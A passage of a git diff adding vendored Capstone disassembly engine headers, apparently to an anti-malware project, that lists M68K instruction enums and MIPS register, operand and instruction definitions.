+ }; +} m68k_op_size; + +/// The M68K instruction and it's operands +typedef struct cs_m68k { + // Number of operands of this instruction or 0 when instruction has no operand. + cs_m68k_op operands[M68K_OPERAND_COUNT]; ///< operands for this instruction. + m68k_op_size op_size; ///< size of data operand works on in bytes (.b, .w, .l, etc) + uint8_t op_count; ///< number of operands for the instruction +} cs_m68k; + +/// M68K instruction +typedef enum m68k_insn { + M68K_INS_INVALID = 0, + + M68K_INS_ABCD, + M68K_INS_ADD, + M68K_INS_ADDA, + M68K_INS_ADDI, + M68K_INS_ADDQ, + M68K_INS_ADDX, + M68K_INS_AND, + M68K_INS_ANDI, + M68K_INS_ASL, + M68K_INS_ASR, + M68K_INS_BHS, + M68K_INS_BLO, + M68K_INS_BHI, + M68K_INS_BLS, + M68K_INS_BCC, + M68K_INS_BCS, + M68K_INS_BNE, + M68K_INS_BEQ, + M68K_INS_BVC, + M68K_INS_BVS, + M68K_INS_BPL, + M68K_INS_BMI, + M68K_INS_BGE, + M68K_INS_BLT, + M68K_INS_BGT, + M68K_INS_BLE, + M68K_INS_BRA, + M68K_INS_BSR, + M68K_INS_BCHG, + M68K_INS_BCLR, + M68K_INS_BSET, + M68K_INS_BTST, + M68K_INS_BFCHG, + M68K_INS_BFCLR, + M68K_INS_BFEXTS, + M68K_INS_BFEXTU, + M68K_INS_BFFFO, + M68K_INS_BFINS, + M68K_INS_BFSET, + M68K_INS_BFTST, + M68K_INS_BKPT, + M68K_INS_CALLM, + M68K_INS_CAS, + M68K_INS_CAS2, + M68K_INS_CHK, + M68K_INS_CHK2, + M68K_INS_CLR, + M68K_INS_CMP, + M68K_INS_CMPA, + M68K_INS_CMPI, + M68K_INS_CMPM, + M68K_INS_CMP2, + M68K_INS_CINVL, + M68K_INS_CINVP, + M68K_INS_CINVA, + M68K_INS_CPUSHL, + M68K_INS_CPUSHP, + M68K_INS_CPUSHA, + M68K_INS_DBT, + M68K_INS_DBF, + M68K_INS_DBHI, + M68K_INS_DBLS, + M68K_INS_DBCC, + M68K_INS_DBCS, + M68K_INS_DBNE, + M68K_INS_DBEQ, + M68K_INS_DBVC, + M68K_INS_DBVS, + M68K_INS_DBPL, + M68K_INS_DBMI, + M68K_INS_DBGE, + M68K_INS_DBLT, + M68K_INS_DBGT, + M68K_INS_DBLE, + M68K_INS_DBRA, + M68K_INS_DIVS, + M68K_INS_DIVSL, + M68K_INS_DIVU, + M68K_INS_DIVUL, + M68K_INS_EOR, + M68K_INS_EORI, + M68K_INS_EXG, + M68K_INS_EXT, + M68K_INS_EXTB, + M68K_INS_FABS, + M68K_INS_FSABS, + M68K_INS_FDABS, + M68K_INS_FACOS, + M68K_INS_FADD, + M68K_INS_FSADD, + M68K_INS_FDADD, + M68K_INS_FASIN, + M68K_INS_FATAN, + M68K_INS_FATANH, + M68K_INS_FBF, + M68K_INS_FBEQ, + M68K_INS_FBOGT, + M68K_INS_FBOGE, + M68K_INS_FBOLT, + M68K_INS_FBOLE, + M68K_INS_FBOGL, + M68K_INS_FBOR, + M68K_INS_FBUN, + M68K_INS_FBUEQ, + M68K_INS_FBUGT, + M68K_INS_FBUGE, + M68K_INS_FBULT, + M68K_INS_FBULE, + M68K_INS_FBNE, + M68K_INS_FBT, + M68K_INS_FBSF, + M68K_INS_FBSEQ, + M68K_INS_FBGT, + M68K_INS_FBGE, + M68K_INS_FBLT, + M68K_INS_FBLE, + M68K_INS_FBGL, + M68K_INS_FBGLE, + M68K_INS_FBNGLE, + M68K_INS_FBNGL, + M68K_INS_FBNLE, + M68K_INS_FBNLT, + M68K_INS_FBNGE, + M68K_INS_FBNGT, + M68K_INS_FBSNE, + M68K_INS_FBST, + M68K_INS_FCMP, + M68K_INS_FCOS, + M68K_INS_FCOSH, + M68K_INS_FDBF, + M68K_INS_FDBEQ, + M68K_INS_FDBOGT, + M68K_INS_FDBOGE, + M68K_INS_FDBOLT, + M68K_INS_FDBOLE, + M68K_INS_FDBOGL, + M68K_INS_FDBOR, + M68K_INS_FDBUN, + M68K_INS_FDBUEQ, + M68K_INS_FDBUGT, + M68K_INS_FDBUGE, + M68K_INS_FDBULT, + M68K_INS_FDBULE, + M68K_INS_FDBNE, + M68K_INS_FDBT, + M68K_INS_FDBSF, + M68K_INS_FDBSEQ, + M68K_INS_FDBGT, + M68K_INS_FDBGE, + M68K_INS_FDBLT, + M68K_INS_FDBLE, + M68K_INS_FDBGL, + M68K_INS_FDBGLE, + M68K_INS_FDBNGLE, + M68K_INS_FDBNGL, + M68K_INS_FDBNLE, + M68K_INS_FDBNLT, + M68K_INS_FDBNGE, + M68K_INS_FDBNGT, + M68K_INS_FDBSNE, + M68K_INS_FDBST, + M68K_INS_FDIV, + M68K_INS_FSDIV, + M68K_INS_FDDIV, + M68K_INS_FETOX, + M68K_INS_FETOXM1, + M68K_INS_FGETEXP, + M68K_INS_FGETMAN, + M68K_INS_FINT, + M68K_INS_FINTRZ, + M68K_INS_FLOG10, + M68K_INS_FLOG2, + M68K_INS_FLOGN, + M68K_INS_FLOGNP1, + M68K_INS_FMOD, + M68K_INS_FMOVE, + M68K_INS_FSMOVE, + M68K_INS_FDMOVE, + M68K_INS_FMOVECR, + M68K_INS_FMOVEM, + M68K_INS_FMUL, + M68K_INS_FSMUL, + M68K_INS_FDMUL, + M68K_INS_FNEG, + M68K_INS_FSNEG, + M68K_INS_FDNEG, + M68K_INS_FNOP, + M68K_INS_FREM, + M68K_INS_FRESTORE, + M68K_INS_FSAVE, + M68K_INS_FSCALE, + M68K_INS_FSGLDIV, + M68K_INS_FSGLMUL, + M68K_INS_FSIN, + M68K_INS_FSINCOS, + M68K_INS_FSINH, + M68K_INS_FSQRT, + M68K_INS_FSSQRT, + M68K_INS_FDSQRT, + M68K_INS_FSF, + M68K_INS_FSBEQ, + M68K_INS_FSOGT, + M68K_INS_FSOGE, + M68K_INS_FSOLT, + M68K_INS_FSOLE, + M68K_INS_FSOGL, + M68K_INS_FSOR, + M68K_INS_FSUN, + M68K_INS_FSUEQ, + M68K_INS_FSUGT, + M68K_INS_FSUGE, + M68K_INS_FSULT, + M68K_INS_FSULE, + M68K_INS_FSNE, + M68K_INS_FST, + M68K_INS_FSSF, + M68K_INS_FSSEQ, + M68K_INS_FSGT, + M68K_INS_FSGE, + M68K_INS_FSLT, + M68K_INS_FSLE, + M68K_INS_FSGL, + M68K_INS_FSGLE, + M68K_INS_FSNGLE, + M68K_INS_FSNGL, + M68K_INS_FSNLE, + M68K_INS_FSNLT, + M68K_INS_FSNGE, + M68K_INS_FSNGT, + M68K_INS_FSSNE, + M68K_INS_FSST, + M68K_INS_FSUB, + M68K_INS_FSSUB, + M68K_INS_FDSUB, + M68K_INS_FTAN, + M68K_INS_FTANH, + M68K_INS_FTENTOX, + M68K_INS_FTRAPF, + M68K_INS_FTRAPEQ, + M68K_INS_FTRAPOGT, + M68K_INS_FTRAPOGE, + M68K_INS_FTRAPOLT, + M68K_INS_FTRAPOLE, + M68K_INS_FTRAPOGL, + M68K_INS_FTRAPOR, + M68K_INS_FTRAPUN, + M68K_INS_FTRAPUEQ, + M68K_INS_FTRAPUGT, + M68K_INS_FTRAPUGE, + M68K_INS_FTRAPULT, + M68K_INS_FTRAPULE, + M68K_INS_FTRAPNE, + M68K_INS_FTRAPT, + M68K_INS_FTRAPSF, + M68K_INS_FTRAPSEQ, + M68K_INS_FTRAPGT, + M68K_INS_FTRAPGE, + M68K_INS_FTRAPLT, + M68K_INS_FTRAPLE, + M68K_INS_FTRAPGL, + M68K_INS_FTRAPGLE, + M68K_INS_FTRAPNGLE, + M68K_INS_FTRAPNGL, + M68K_INS_FTRAPNLE, + M68K_INS_FTRAPNLT, + M68K_INS_FTRAPNGE, + M68K_INS_FTRAPNGT, + M68K_INS_FTRAPSNE, + M68K_INS_FTRAPST, + M68K_INS_FTST, + M68K_INS_FTWOTOX, + M68K_INS_HALT, + M68K_INS_ILLEGAL, + M68K_INS_JMP, + M68K_INS_JSR, + M68K_INS_LEA, + M68K_INS_LINK, + M68K_INS_LPSTOP, + M68K_INS_LSL, + M68K_INS_LSR, + M68K_INS_MOVE, + M68K_INS_MOVEA, + M68K_INS_MOVEC, + M68K_INS_MOVEM, + M68K_INS_MOVEP, + M68K_INS_MOVEQ, + M68K_INS_MOVES, + M68K_INS_MOVE16, + M68K_INS_MULS, + M68K_INS_MULU, + M68K_INS_NBCD, + M68K_INS_NEG, + M68K_INS_NEGX, + M68K_INS_NOP, + M68K_INS_NOT, + M68K_INS_OR, + M68K_INS_ORI, + M68K_INS_PACK, + M68K_INS_PEA, + M68K_INS_PFLUSH, + M68K_INS_PFLUSHA, + M68K_INS_PFLUSHAN, + M68K_INS_PFLUSHN, + M68K_INS_PLOADR, + M68K_INS_PLOADW, + M68K_INS_PLPAR, + M68K_INS_PLPAW, + M68K_INS_PMOVE, + M68K_INS_PMOVEFD, + M68K_INS_PTESTR, + M68K_INS_PTESTW, + M68K_INS_PULSE, + M68K_INS_REMS, + M68K_INS_REMU, + M68K_INS_RESET, + M68K_INS_ROL, + M68K_INS_ROR, + M68K_INS_ROXL, + M68K_INS_ROXR, + M68K_INS_RTD, + M68K_INS_RTE, + M68K_INS_RTM, + M68K_INS_RTR, + M68K_INS_RTS, + M68K_INS_SBCD, + M68K_INS_ST, + M68K_INS_SF, + M68K_INS_SHI, + M68K_INS_SLS, + M68K_INS_SCC, + M68K_INS_SHS, + M68K_INS_SCS, + M68K_INS_SLO, + M68K_INS_SNE, + M68K_INS_SEQ, + M68K_INS_SVC, + M68K_INS_SVS, + M68K_INS_SPL, + M68K_INS_SMI, + M68K_INS_SGE, + M68K_INS_SLT, + M68K_INS_SGT, + M68K_INS_SLE, + M68K_INS_STOP, + M68K_INS_SUB, + M68K_INS_SUBA, + M68K_INS_SUBI, + M68K_INS_SUBQ, + M68K_INS_SUBX, + M68K_INS_SWAP, + M68K_INS_TAS, + M68K_INS_TRAP, + M68K_INS_TRAPV, + M68K_INS_TRAPT, + M68K_INS_TRAPF, + M68K_INS_TRAPHI, + M68K_INS_TRAPLS, + M68K_INS_TRAPCC, + M68K_INS_TRAPHS, + M68K_INS_TRAPCS, + M68K_INS_TRAPLO, + M68K_INS_TRAPNE, + M68K_INS_TRAPEQ, + M68K_INS_TRAPVC, + M68K_INS_TRAPVS, + M68K_INS_TRAPPL, + M68K_INS_TRAPMI, + M68K_INS_TRAPGE, + M68K_INS_TRAPLT, + M68K_INS_TRAPGT, + M68K_INS_TRAPLE, + M68K_INS_TST, + M68K_INS_UNLK, + M68K_INS_UNPK, + M68K_INS_ENDING, // <-- mark the end of the list of instructions +} m68k_insn; + +/// Group of M68K instructions +typedef enum m68k_group_type { + M68K_GRP_INVALID = 0, ///< CS_GRUP_INVALID + M68K_GRP_JUMP, ///< = CS_GRP_JUMP + M68K_GRP_RET = 3, ///< = CS_GRP_RET + M68K_GRP_IRET = 5, ///< = CS_GRP_IRET + M68K_GRP_BRANCH_RELATIVE = 7, ///< = CS_GRP_BRANCH_RELATIVE + + M68K_GRP_ENDING,// <-- mark the end of the list of groups +} m68k_group_type; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/mips.h b/ai_anti_malware/capstone/include/capstone/mips.h new file mode 100644 index 0000000..f10c303 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/mips.h @@ -0,0 +1,956 @@ +#ifndef CAPSTONE_MIPS_H +#define CAPSTONE_MIPS_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2013-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +// GCC MIPS toolchain has a default macro called "mips" which breaks +// compilation +#undef mips + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// Operand type for instruction's operands +typedef enum mips_op_type { + MIPS_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + MIPS_OP_REG, ///< = CS_OP_REG (Register operand). + MIPS_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + MIPS_OP_MEM, ///< = CS_OP_MEM (Memory operand). +} mips_op_type; + +/// MIPS registers +typedef enum mips_reg { + MIPS_REG_INVALID = 0, + // General purpose registers + MIPS_REG_PC, + + MIPS_REG_0, + MIPS_REG_1, + MIPS_REG_2, + MIPS_REG_3, + MIPS_REG_4, + MIPS_REG_5, + MIPS_REG_6, + MIPS_REG_7, + MIPS_REG_8, + MIPS_REG_9, + MIPS_REG_10, + MIPS_REG_11, + MIPS_REG_12, + MIPS_REG_13, + MIPS_REG_14, + MIPS_REG_15, + MIPS_REG_16, + MIPS_REG_17, + MIPS_REG_18, + MIPS_REG_19, + MIPS_REG_20, + MIPS_REG_21, + MIPS_REG_22, + MIPS_REG_23, + MIPS_REG_24, + MIPS_REG_25, + MIPS_REG_26, + MIPS_REG_27, + MIPS_REG_28, + MIPS_REG_29, + MIPS_REG_30, + MIPS_REG_31, + + // DSP registers + MIPS_REG_DSPCCOND, + MIPS_REG_DSPCARRY, + MIPS_REG_DSPEFI, + MIPS_REG_DSPOUTFLAG, + MIPS_REG_DSPOUTFLAG16_19, + MIPS_REG_DSPOUTFLAG20, + MIPS_REG_DSPOUTFLAG21, + MIPS_REG_DSPOUTFLAG22, + MIPS_REG_DSPOUTFLAG23, + MIPS_REG_DSPPOS, + MIPS_REG_DSPSCOUNT, + + // ACC registers + MIPS_REG_AC0, + MIPS_REG_AC1, + MIPS_REG_AC2, + MIPS_REG_AC3, + + // COP registers + MIPS_REG_CC0, + MIPS_REG_CC1, + MIPS_REG_CC2, + MIPS_REG_CC3, + MIPS_REG_CC4, + MIPS_REG_CC5, + MIPS_REG_CC6, + MIPS_REG_CC7, + + // FPU registers + MIPS_REG_F0, + MIPS_REG_F1, + MIPS_REG_F2, + MIPS_REG_F3, + MIPS_REG_F4, + MIPS_REG_F5, + MIPS_REG_F6, + MIPS_REG_F7, + MIPS_REG_F8, + MIPS_REG_F9, + MIPS_REG_F10, + MIPS_REG_F11, + MIPS_REG_F12, + MIPS_REG_F13, + MIPS_REG_F14, + MIPS_REG_F15, + MIPS_REG_F16, + MIPS_REG_F17, + MIPS_REG_F18, + MIPS_REG_F19, + MIPS_REG_F20, + MIPS_REG_F21, + MIPS_REG_F22, + MIPS_REG_F23, + MIPS_REG_F24, + MIPS_REG_F25, + MIPS_REG_F26, + MIPS_REG_F27, + MIPS_REG_F28, + MIPS_REG_F29, + MIPS_REG_F30, + MIPS_REG_F31, + + MIPS_REG_FCC0, + MIPS_REG_FCC1, + MIPS_REG_FCC2, + MIPS_REG_FCC3, + MIPS_REG_FCC4, + MIPS_REG_FCC5, + MIPS_REG_FCC6, + MIPS_REG_FCC7, + + // AFPR128 + MIPS_REG_W0, + MIPS_REG_W1, + MIPS_REG_W2, + MIPS_REG_W3, + MIPS_REG_W4, + MIPS_REG_W5, + MIPS_REG_W6, + MIPS_REG_W7, + MIPS_REG_W8, + MIPS_REG_W9, + MIPS_REG_W10, + MIPS_REG_W11, + MIPS_REG_W12, + MIPS_REG_W13, + MIPS_REG_W14, + MIPS_REG_W15, + MIPS_REG_W16, + MIPS_REG_W17, + MIPS_REG_W18, + MIPS_REG_W19, + MIPS_REG_W20, + MIPS_REG_W21, + MIPS_REG_W22, + MIPS_REG_W23, + MIPS_REG_W24, + MIPS_REG_W25, + MIPS_REG_W26, + MIPS_REG_W27, + MIPS_REG_W28, + MIPS_REG_W29, + MIPS_REG_W30, + MIPS_REG_W31, + + MIPS_REG_HI, + MIPS_REG_LO, + + MIPS_REG_P0, + MIPS_REG_P1, + MIPS_REG_P2, + + MIPS_REG_MPL0, + MIPS_REG_MPL1, + MIPS_REG_MPL2, + + MIPS_REG_ENDING, // <-- mark the end of the list or registers + + // alias registers + MIPS_REG_ZERO = MIPS_REG_0, + MIPS_REG_AT = MIPS_REG_1, + MIPS_REG_V0 = MIPS_REG_2, + MIPS_REG_V1 = MIPS_REG_3, + MIPS_REG_A0 = MIPS_REG_4, + MIPS_REG_A1 = MIPS_REG_5, + MIPS_REG_A2 = MIPS_REG_6, + MIPS_REG_A3 = MIPS_REG_7, + MIPS_REG_T0 = MIPS_REG_8, + MIPS_REG_T1 = MIPS_REG_9, + MIPS_REG_T2 = MIPS_REG_10, + MIPS_REG_T3 = MIPS_REG_11, + MIPS_REG_T4 = MIPS_REG_12, + MIPS_REG_T5 = MIPS_REG_13, + MIPS_REG_T6 = MIPS_REG_14, + MIPS_REG_T7 = MIPS_REG_15, + MIPS_REG_S0 = MIPS_REG_16, + MIPS_REG_S1 = MIPS_REG_17, + MIPS_REG_S2 = MIPS_REG_18, + MIPS_REG_S3 = MIPS_REG_19, + MIPS_REG_S4 = MIPS_REG_20, + MIPS_REG_S5 = MIPS_REG_21, + MIPS_REG_S6 = MIPS_REG_22, + MIPS_REG_S7 = MIPS_REG_23, + MIPS_REG_T8 = MIPS_REG_24, + MIPS_REG_T9 = MIPS_REG_25, + MIPS_REG_K0 = MIPS_REG_26, + MIPS_REG_K1 = MIPS_REG_27, + MIPS_REG_GP = MIPS_REG_28, + MIPS_REG_SP = MIPS_REG_29, + MIPS_REG_FP = MIPS_REG_30, MIPS_REG_S8 = MIPS_REG_30, + MIPS_REG_RA = MIPS_REG_31, + + MIPS_REG_HI0 = MIPS_REG_AC0, + MIPS_REG_HI1 = MIPS_REG_AC1, + MIPS_REG_HI2 = MIPS_REG_AC2, + MIPS_REG_HI3 = MIPS_REG_AC3, + + MIPS_REG_LO0 = MIPS_REG_HI0, + MIPS_REG_LO1 = MIPS_REG_HI1, + MIPS_REG_LO2 = MIPS_REG_HI2, + MIPS_REG_LO3 = MIPS_REG_HI3, +} mips_reg; + +/// Instruction's operand referring to memory +/// This is associated with MIPS_OP_MEM operand type above +typedef struct mips_op_mem { + mips_reg base; ///< base register + int64_t disp; ///< displacement/offset value +} mips_op_mem; + +/// Instruction operand +typedef struct cs_mips_op { + mips_op_type type; ///< operand type + union { + mips_reg reg; ///< register value for REG operand + int64_t imm; ///< immediate value for IMM operand + mips_op_mem mem; ///< base/index/scale/disp value for MEM operand + }; +} cs_mips_op; + +/// Instruction structure +typedef struct cs_mips { + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + cs_mips_op operands[10]; ///< operands for this instruction. +} cs_mips; + +/// MIPS instruction +typedef enum mips_insn { + MIPS_INS_INVALID = 0, + + MIPS_INS_ABSQ_S, + MIPS_INS_ADD, + MIPS_INS_ADDIUPC, + MIPS_INS_ADDIUR1SP, + MIPS_INS_ADDIUR2, + MIPS_INS_ADDIUS5, + MIPS_INS_ADDIUSP, + MIPS_INS_ADDQH, + MIPS_INS_ADDQH_R, + MIPS_INS_ADDQ, + MIPS_INS_ADDQ_S, + MIPS_INS_ADDSC, + MIPS_INS_ADDS_A, + MIPS_INS_ADDS_S, + MIPS_INS_ADDS_U, + MIPS_INS_ADDU16, + MIPS_INS_ADDUH, + MIPS_INS_ADDUH_R, + MIPS_INS_ADDU, + MIPS_INS_ADDU_S, + MIPS_INS_ADDVI, + MIPS_INS_ADDV, + MIPS_INS_ADDWC, + MIPS_INS_ADD_A, + MIPS_INS_ADDI, + MIPS_INS_ADDIU, + MIPS_INS_ALIGN, + MIPS_INS_ALUIPC, + MIPS_INS_AND, + MIPS_INS_AND16, + MIPS_INS_ANDI16, + MIPS_INS_ANDI, + MIPS_INS_APPEND, + MIPS_INS_ASUB_S, + MIPS_INS_ASUB_U, + MIPS_INS_AUI, + MIPS_INS_AUIPC, + MIPS_INS_AVER_S, + MIPS_INS_AVER_U, + MIPS_INS_AVE_S, + MIPS_INS_AVE_U, + MIPS_INS_B16, + MIPS_INS_BADDU, + MIPS_INS_BAL, + MIPS_INS_BALC, + MIPS_INS_BALIGN, + MIPS_INS_BBIT0, + MIPS_INS_BBIT032, + MIPS_INS_BBIT1, + MIPS_INS_BBIT132, + MIPS_INS_BC, + MIPS_INS_BC0F, + MIPS_INS_BC0FL, + MIPS_INS_BC0T, + MIPS_INS_BC0TL, + MIPS_INS_BC1EQZ, + MIPS_INS_BC1F, + MIPS_INS_BC1FL, + MIPS_INS_BC1NEZ, + MIPS_INS_BC1T, + MIPS_INS_BC1TL, + MIPS_INS_BC2EQZ, + MIPS_INS_BC2F, + MIPS_INS_BC2FL, + MIPS_INS_BC2NEZ, + MIPS_INS_BC2T, + MIPS_INS_BC2TL, + MIPS_INS_BC3F, + MIPS_INS_BC3FL, + MIPS_INS_BC3T, + MIPS_INS_BC3TL, + MIPS_INS_BCLRI, + MIPS_INS_BCLR, + MIPS_INS_BEQ, + MIPS_INS_BEQC, + MIPS_INS_BEQL, + MIPS_INS_BEQZ16, + MIPS_INS_BEQZALC, + MIPS_INS_BEQZC, + MIPS_INS_BGEC, + MIPS_INS_BGEUC, + MIPS_INS_BGEZ, + MIPS_INS_BGEZAL, + MIPS_INS_BGEZALC, + MIPS_INS_BGEZALL, + MIPS_INS_BGEZALS, + MIPS_INS_BGEZC, + MIPS_INS_BGEZL, + MIPS_INS_BGTZ, + MIPS_INS_BGTZALC, + MIPS_INS_BGTZC, + MIPS_INS_BGTZL, + MIPS_INS_BINSLI, + MIPS_INS_BINSL, + MIPS_INS_BINSRI, + MIPS_INS_BINSR, + MIPS_INS_BITREV, + MIPS_INS_BITSWAP, + MIPS_INS_BLEZ, + MIPS_INS_BLEZALC, + MIPS_INS_BLEZC, + MIPS_INS_BLEZL, + MIPS_INS_BLTC, + MIPS_INS_BLTUC, + MIPS_INS_BLTZ, + MIPS_INS_BLTZAL, + MIPS_INS_BLTZALC, + MIPS_INS_BLTZALL, + MIPS_INS_BLTZALS, + MIPS_INS_BLTZC, + MIPS_INS_BLTZL, + MIPS_INS_BMNZI, + MIPS_INS_BMNZ, + MIPS_INS_BMZI, + MIPS_INS_BMZ, + MIPS_INS_BNE, + MIPS_INS_BNEC, + MIPS_INS_BNEGI, + MIPS_INS_BNEG, + MIPS_INS_BNEL, + MIPS_INS_BNEZ16, + MIPS_INS_BNEZALC, + MIPS_INS_BNEZC, + MIPS_INS_BNVC, + MIPS_INS_BNZ, + MIPS_INS_BOVC, + MIPS_INS_BPOSGE32, + MIPS_INS_BREAK, + MIPS_INS_BREAK16, + MIPS_INS_BSELI, + MIPS_INS_BSEL, + MIPS_INS_BSETI, + MIPS_INS_BSET, + MIPS_INS_BZ, + MIPS_INS_BEQZ, + MIPS_INS_B, + MIPS_INS_BNEZ, + MIPS_INS_BTEQZ, + MIPS_INS_BTNEZ, + MIPS_INS_CACHE, + MIPS_INS_CEIL, + MIPS_INS_CEQI, + MIPS_INS_CEQ, + MIPS_INS_CFC1, + MIPS_INS_CFCMSA, + MIPS_INS_CINS, + MIPS_INS_CINS32, + MIPS_INS_CLASS, + MIPS_INS_CLEI_S, + MIPS_INS_CLEI_U, + MIPS_INS_CLE_S, + MIPS_INS_CLE_U, + MIPS_INS_CLO, + MIPS_INS_CLTI_S, + MIPS_INS_CLTI_U, + MIPS_INS_CLT_S, + MIPS_INS_CLT_U, + MIPS_INS_CLZ, + MIPS_INS_CMPGDU, + MIPS_INS_CMPGU, + MIPS_INS_CMPU, + MIPS_INS_CMP, + MIPS_INS_COPY_S, + MIPS_INS_COPY_U, + MIPS_INS_CTC1, + MIPS_INS_CTCMSA, + MIPS_INS_CVT, + MIPS_INS_C, + MIPS_INS_CMPI, + MIPS_INS_DADD, + MIPS_INS_DADDI, + MIPS_INS_DADDIU, + MIPS_INS_DADDU, + MIPS_INS_DAHI, + MIPS_INS_DALIGN, + MIPS_INS_DATI, + MIPS_INS_DAUI, + MIPS_INS_DBITSWAP, + MIPS_INS_DCLO, + MIPS_INS_DCLZ, + MIPS_INS_DDIV, + MIPS_INS_DDIVU, + MIPS_INS_DERET, + MIPS_INS_DEXT, + MIPS_INS_DEXTM, + MIPS_INS_DEXTU, + MIPS_INS_DI, + MIPS_INS_DINS, + MIPS_INS_DINSM, + MIPS_INS_DINSU, + MIPS_INS_DIV, + MIPS_INS_DIVU, + MIPS_INS_DIV_S, + MIPS_INS_DIV_U, + MIPS_INS_DLSA, + MIPS_INS_DMFC0, + MIPS_INS_DMFC1, + MIPS_INS_DMFC2, + MIPS_INS_DMOD, + MIPS_INS_DMODU, + MIPS_INS_DMTC0, + MIPS_INS_DMTC1, + MIPS_INS_DMTC2, + MIPS_INS_DMUH, + MIPS_INS_DMUHU, + MIPS_INS_DMUL, + MIPS_INS_DMULT, + MIPS_INS_DMULTU, + MIPS_INS_DMULU, + MIPS_INS_DOTP_S, + MIPS_INS_DOTP_U, + MIPS_INS_DPADD_S, + MIPS_INS_DPADD_U, + MIPS_INS_DPAQX_SA, + MIPS_INS_DPAQX_S, + MIPS_INS_DPAQ_SA, + MIPS_INS_DPAQ_S, + MIPS_INS_DPAU, + MIPS_INS_DPAX, + MIPS_INS_DPA, + MIPS_INS_DPOP, + MIPS_INS_DPSQX_SA, + MIPS_INS_DPSQX_S, + MIPS_INS_DPSQ_SA, + MIPS_INS_DPSQ_S, + MIPS_INS_DPSUB_S, + MIPS_INS_DPSUB_U, + MIPS_INS_DPSU, + MIPS_INS_DPSX, + MIPS_INS_DPS, + MIPS_INS_DROTR, + MIPS_INS_DROTR32, + MIPS_INS_DROTRV, + MIPS_INS_DSBH, + MIPS_INS_DSHD, + MIPS_INS_DSLL, + MIPS_INS_DSLL32, + MIPS_INS_DSLLV, + MIPS_INS_DSRA, + MIPS_INS_DSRA32, + MIPS_INS_DSRAV, + MIPS_INS_DSRL, + MIPS_INS_DSRL32, + MIPS_INS_DSRLV, + MIPS_INS_DSUB, + MIPS_INS_DSUBU, + MIPS_INS_EHB, + MIPS_INS_EI, + MIPS_INS_ERET, + MIPS_INS_EXT, + MIPS_INS_EXTP, + MIPS_INS_EXTPDP, + MIPS_INS_EXTPDPV, + MIPS_INS_EXTPV, + MIPS_INS_EXTRV_RS, + MIPS_INS_EXTRV_R, + MIPS_INS_EXTRV_S, + MIPS_INS_EXTRV, + MIPS_INS_EXTR_RS, + MIPS_INS_EXTR_R, + MIPS_INS_EXTR_S, + MIPS_INS_EXTR, + MIPS_INS_EXTS, + MIPS_INS_EXTS32, + MIPS_INS_ABS, + MIPS_INS_FADD, + MIPS_INS_FCAF, + MIPS_INS_FCEQ, + MIPS_INS_FCLASS, + MIPS_INS_FCLE, + MIPS_INS_FCLT, + MIPS_INS_FCNE, + MIPS_INS_FCOR, + MIPS_INS_FCUEQ, + MIPS_INS_FCULE, + MIPS_INS_FCULT, + MIPS_INS_FCUNE, + MIPS_INS_FCUN, + MIPS_INS_FDIV, + MIPS_INS_FEXDO, + MIPS_INS_FEXP2, + MIPS_INS_FEXUPL, + MIPS_INS_FEXUPR, + MIPS_INS_FFINT_S, + MIPS_INS_FFINT_U, + MIPS_INS_FFQL, + MIPS_INS_FFQR, + MIPS_INS_FILL, + MIPS_INS_FLOG2, + MIPS_INS_FLOOR, + MIPS_INS_FMADD, + MIPS_INS_FMAX_A, + MIPS_INS_FMAX, + MIPS_INS_FMIN_A, + MIPS_INS_FMIN, + MIPS_INS_MOV, + MIPS_INS_FMSUB, + MIPS_INS_FMUL, + MIPS_INS_MUL, + MIPS_INS_NEG, + MIPS_INS_FRCP, + MIPS_INS_FRINT, + MIPS_INS_FRSQRT, + MIPS_INS_FSAF, + MIPS_INS_FSEQ, + MIPS_INS_FSLE, + MIPS_INS_FSLT, + MIPS_INS_FSNE, + MIPS_INS_FSOR, + MIPS_INS_FSQRT, + MIPS_INS_SQRT, + MIPS_INS_FSUB, + MIPS_INS_SUB, + MIPS_INS_FSUEQ, + MIPS_INS_FSULE, + MIPS_INS_FSULT, + MIPS_INS_FSUNE, + MIPS_INS_FSUN, + MIPS_INS_FTINT_S, + MIPS_INS_FTINT_U, + MIPS_INS_FTQ, + MIPS_INS_FTRUNC_S, + MIPS_INS_FTRUNC_U, + MIPS_INS_HADD_S, + MIPS_INS_HADD_U, + MIPS_INS_HSUB_S, + MIPS_INS_HSUB_U, + MIPS_INS_ILVEV, + MIPS_INS_ILVL, + MIPS_INS_ILVOD, + MIPS_INS_ILVR, + MIPS_INS_INS, + MIPS_INS_INSERT, + MIPS_INS_INSV, + MIPS_INS_INSVE, + MIPS_INS_J, + MIPS_INS_JAL, + MIPS_INS_JALR, + MIPS_INS_JALRS16, + MIPS_INS_JALRS, + MIPS_INS_JALS, + MIPS_INS_JALX, + MIPS_INS_JIALC, + MIPS_INS_JIC, + MIPS_INS_JR, + MIPS_INS_JR16, + MIPS_INS_JRADDIUSP, + MIPS_INS_JRC, + MIPS_INS_JALRC, + MIPS_INS_LB, + MIPS_INS_LBU16, + MIPS_INS_LBUX, + MIPS_INS_LBU, + MIPS_INS_LD, + MIPS_INS_LDC1, + MIPS_INS_LDC2, + MIPS_INS_LDC3, + MIPS_INS_LDI, + MIPS_INS_LDL, + MIPS_INS_LDPC, + MIPS_INS_LDR, + MIPS_INS_LDXC1, + MIPS_INS_LH, + MIPS_INS_LHU16, + MIPS_INS_LHX, + MIPS_INS_LHU, + MIPS_INS_LI16, + MIPS_INS_LL, + MIPS_INS_LLD, + MIPS_INS_LSA, + MIPS_INS_LUXC1, + MIPS_INS_LUI, + MIPS_INS_LW, + MIPS_INS_LW16, + MIPS_INS_LWC1, + MIPS_INS_LWC2, + MIPS_INS_LWC3, + MIPS_INS_LWL, + MIPS_INS_LWM16, + MIPS_INS_LWM32, + MIPS_INS_LWPC, + MIPS_INS_LWP, + MIPS_INS_LWR, + MIPS_INS_LWUPC, + MIPS_INS_LWU, + MIPS_INS_LWX, + MIPS_INS_LWXC1, + MIPS_INS_LWXS, + MIPS_INS_LI, + MIPS_INS_MADD, + MIPS_INS_MADDF, + MIPS_INS_MADDR_Q, 